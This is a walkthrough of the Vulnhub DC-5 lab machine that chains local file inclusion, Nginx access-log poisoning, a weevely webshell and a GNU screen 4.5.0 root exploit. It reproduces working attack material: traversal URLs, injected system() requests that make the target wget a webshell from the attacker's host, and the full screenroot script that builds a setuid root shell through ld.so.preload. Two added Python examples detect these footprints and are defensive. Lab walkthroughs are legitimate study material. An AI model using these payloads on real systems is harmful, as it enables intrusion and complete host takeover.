
Vulnhub DC-5: hands-on range walkthrough

Based on the changes above, capture a request in Burp and analyse it.
Approach 1: brute-force the site to discover which files can be browsed.
Add Filenames-short and Filenames-long to the wordlist.
http://192.168.206.139/thankyou.php?file=../../../../../../../../../etc/passwd
Nginx log locations:
/var/log/nginx/error.log
/var/log/nginx/access.log
Anything submitted through the browser URL bar is URL-encoded first, so we submit through Burp instead: what Burp sends goes out verbatim, with no URL encoding.
That means we can submit a one-line webshell this way.
Next, generate a PHP webshell on the attack machine; since we are running as root, it is created in /root by default.
weevely generate 123456 haha.php
Next, serve the file over HTTP with Python (commands below). On Kali the served directory defaults to /home/kali:
python -m SimpleHTTPServer
With Python 3 the command is python -m http.server <port>; on Parrot the served directory defaults to /root:
python -m http.server 8000
chmod 777 haha.php
GET /thankyou.php?file=/var/log/nginx/access.log&a=system('cd /tmp;wget http://192.168.206.136:8000/haha.php;chmod +x haha.php'); HTTP/1.1
GET /thankyou.php?file=/var/log/nginx/access.log&a=system('cd /tmp;wget http://192.168.206.128:8000/haha.php;chmod +x haha.php'); HTTP/1.1
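The two request patterns above (directory traversal in the file parameter, and PHP code planted in a request so that including the Nginx access log executes it) both leave a footprint in that same access log. The following added example, which is not part of the original walkthrough, is a small scanner for that footprint; the log lines it reads are constructed for the example in the default Nginx "combined" format, and the match patterns are my own choice, not a complete signature set.

```python
"""Scan Nginx access-log lines for LFI traversal and log-poisoning footprints.
Added example, not code from the walkthrough; sample lines are constructed."""
import re
from urllib.parse import unquote

# Constructed sample lines (Nginx "combined" format, not from a real host).
SAMPLE_LOG = """\
192.168.206.128 - - [10/Mar/2024:10:00:01 +0000] "GET /thankyou.php?file=footer.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.206.128 - - [10/Mar/2024:10:00:02 +0000] "GET /thankyou.php?file=../../../../../../../../../etc/passwd HTTP/1.1" 200 1503 "-" "Mozilla/5.0"
192.168.206.128 - - [10/Mar/2024:10:00:03 +0000] "GET /thankyou.php?file=/var/log/nginx/access.log&a=system('id'); HTTP/1.1" 200 20480 "-" "<?php system($_GET['a']); ?>"
192.168.206.128 - - [10/Mar/2024:10:00:04 +0000] "GET /thankyou.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1503 "-" "Mozilla/5.0"
192.168.206.128 - - [10/Mar/2024:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# One "combined" log line: ip ident user [ts] "METHOD path PROTO" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Traversal or sensitive-file indicators in the include parameter.
TRAVERSAL_RE = re.compile(r'(\.\./|/etc/passwd|/var/log/|/proc/self/)', re.I)
# PHP code that would run if this log line is later pulled in by include().
PHP_TAG_RE = re.compile(r'<\?(php|=)|system\(|passthru\(|shell_exec\(', re.I)


def classify(line):
    """Return finding tags for one access-log line; an empty list means benign."""
    m = LINE_RE.match(line)
    if not m:
        return ['unparsed']
    findings = []
    # Decode twice so single- and double-encoded traversal both surface.
    path = unquote(unquote(m.group('path')))
    ua = m.group('ua')
    if 'file=' in path and TRAVERSAL_RE.search(path):
        findings.append('lfi_traversal')
    if PHP_TAG_RE.search(path) or PHP_TAG_RE.search(ua):
        findings.append('log_poisoning')
    return findings


def scan(log_text):
    """Map 1-based line numbers to their findings, omitting benign lines."""
    results = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        f = classify(line)
        if f:
            results[n] = f
    return results


if __name__ == '__main__':
    for n, f in scan(SAMPLE_LOG).items():
        print(n, f)
```

The scanner deliberately looks at the User-Agent as well as the query string, because a poisoned entry can sit in either field; a real deployment would add the referer and any other logged request header.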

Next, use the tool to connect to the webshell:
weevely http://192.168.206.139/thankyou.php?file=/tmp/haha.php 123456
searchsploit screen 4.5.0
find / -name exploitdb
Because the attack machine is Parrot, the exploitdb directory differs from Kali:
cp /opt/exploitdb/exploits/linux/local/41152.txt /home/user
cp /opt/exploitdb/exploits/linux/local/41154.sh /home/user
On Kali the directory is:
cp /usr/share/exploitdb/exploits/linux/local/41152.txt /home/kali/41152.txt
cp /usr/share/exploitdb/exploits/linux/local/41154.sh /home/kali/41154.sh
Because of the circumstances here, the attack machine is switched back to Kali (192.168.206.128).
Contents of 41152:
Commit f86a374 ("screen.c: adding permissions check for the logfile name",
2015-11-04)
The check opens the logfile with full root privileges. This allows us to
truncate any file or create a root-owned file with any contents in any
directory and can be easily exploited to full root access in several ways.
> address@hidden:~$ screen --version
> Screen version 4.05.00 (GNU) 10-Dec-16
> address@hidden:~$ id
> uid=125(buczek) gid=125(buczek)
groups=125(buczek),15(users),19(adm),42(admin),154(Omp3grp),200(algrgrp),209(cdgrp),242(gridgrp),328(nchemgrp),407(hoeheweb),446(spwgrp),453(helpdesk),512(twikigrp),584(zmgrp),598(edv),643(megamgrp),677(greedgrp),5000(abt_srv),16003(framesgr),16012(chrigrp),17001(priv_cpw)
> address@hidden:~$ cd /etc
> address@hidden:/etc (master)$ screen -D -m -L bla.bla echo fail
> address@hidden:/etc (master)$ ls -l bla.bla
> -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> address@hidden:/etc (master)$ cat bla.bla
> fail
> address@hidden:/etc (master)$
Donald Buczek <address@hidden>
EDB Note: Follow up ~ http://seclists.org/oss-sec/2017/q1/184
Contents of 41154:
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
How to run it:
1. Save the first highlighted block to libhax.c in the target directory and compile it with gcc.
2. Save the second highlighted block to rootshell.c in the same directory and compile it with gcc.
3. Save the last highlighted block to xxx.sh in the same directory.
4. Finally:
chmod 777 xxx.sh
Next, switch to the webshell session controlling the victim: move the compiled files into the home directory on the attack machine and transfer them with the Python HTTP server.
mv /tmp/libhax.so /home/kali/libhax.so
mv /tmp/rootshell /home/kali/rootshell
mv /tmp/clickme.sh /home/kali/clickme.sh
cd /tmp
wget http://192.168.206.128:8000/libhax.so
wget http://192.168.206.128:8000/rootshell
wget http://192.168.206.128:8000/clickme.sh
cd /tmp
chmod +x libhax.so
chmod +x rootshell
chmod +x clickme.sh
./xxx.sh
Privilege escalation failed, but the technique is correct!! Worth learning!


Improvement:
clickme.sh
#!/bin/bash
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
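From the defender's side, the 41154 script depends on two host conditions: a setuid-root GNU screen at the affected release, and a loader preload file it can seed with a library outside the system library directories. The following added example (my code, not from the walkthrough or from exploit-db) checks both conditions offline from captured strings, so it can be dropped into an audit script. It assumes the release named in the advisory (4.5.0) and anything older is affected, and that a legitimate /etc/ld.so.preload only lists libraries under the standard library prefixes; both are labelled assumptions in the code.

```python
"""Offline checks for the preconditions of the screen 4.5.0 logfile bug.
Added example; inputs are constructed strings, not output from a live host."""
import re

VERSION_RE = re.compile(r'Screen version (\d+)\.(\d+)\.(\d+)')
# Assumption: the advisory above targets 4.5.0; treat that release and older as affected.
LAST_AFFECTED = (4, 5, 0)

# Assumption: a legitimate ld.so.preload only names libraries under these prefixes.
TRUSTED_PREFIXES = ('/lib/', '/lib64/', '/usr/lib/', '/usr/lib64/')


def parse_screen_version(output):
    """Parse 'screen --version' output, e.g. 'Screen version 4.05.00 (GNU) 10-Dec-16' -> (4, 5, 0)."""
    m = VERSION_RE.search(output)
    if not m:
        return None
    return tuple(int(x) for x in m.groups())


def screen_is_affected(output, setuid_root=True):
    """True when the version is at or below LAST_AFFECTED and the binary is setuid root.
    setuid_root is supplied by the caller (e.g. from a stat() of the binary)."""
    v = parse_screen_version(output)
    return v is not None and v <= LAST_AFFECTED and setuid_root


def audit_ld_so_preload(content):
    """Return entries of an ld.so.preload file that point outside the trusted prefixes.
    Entries are taken as whitespace- or colon-separated tokens; text after '#' is
    dropped as a comment (lenient parsing, an assumption rather than the loader's spec).
    An entry such as /tmp/libhax.so is exactly what the script above writes."""
    suspicious = []
    for raw in content.splitlines():
        line = raw.split('#', 1)[0]
        for entry in re.split(r'[\s:]+', line):
            if entry and not entry.startswith(TRUSTED_PREFIXES):
                suspicious.append(entry)
    return suspicious


if __name__ == '__main__':
    # Constructed inputs mirroring the advisory transcript and the script's payload.
    print(screen_is_affected('Screen version 4.05.00 (GNU) 10-Dec-16'))
    print(audit_ld_so_preload('\n/tmp/libhax.so'))
```

Note that an empty or absent /etc/ld.so.preload is the normal state on most distributions, so any non-empty file found by the audit deserves a look, and one naming a path under /tmp or a home directory is the direct footprint of the technique on this page.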

Follow-up operations!
Write the one-line webshell straight into the log through a POST request, then connect to it directly with the tool.
Because of insufficient permissions, files cannot be uploaded, so consider placing the shell under /tmp and then reaching it through the file inclusion or by accessing it directly:
http://192.168.206.139/thankyou.php?file=../../../../../../../../tmp/miansha.php
The problem found, however, is that the file is merely included; it cannot execute any functionality!
For now the website side has to be set aside! Since there are not many files, they can be downloaded one by one.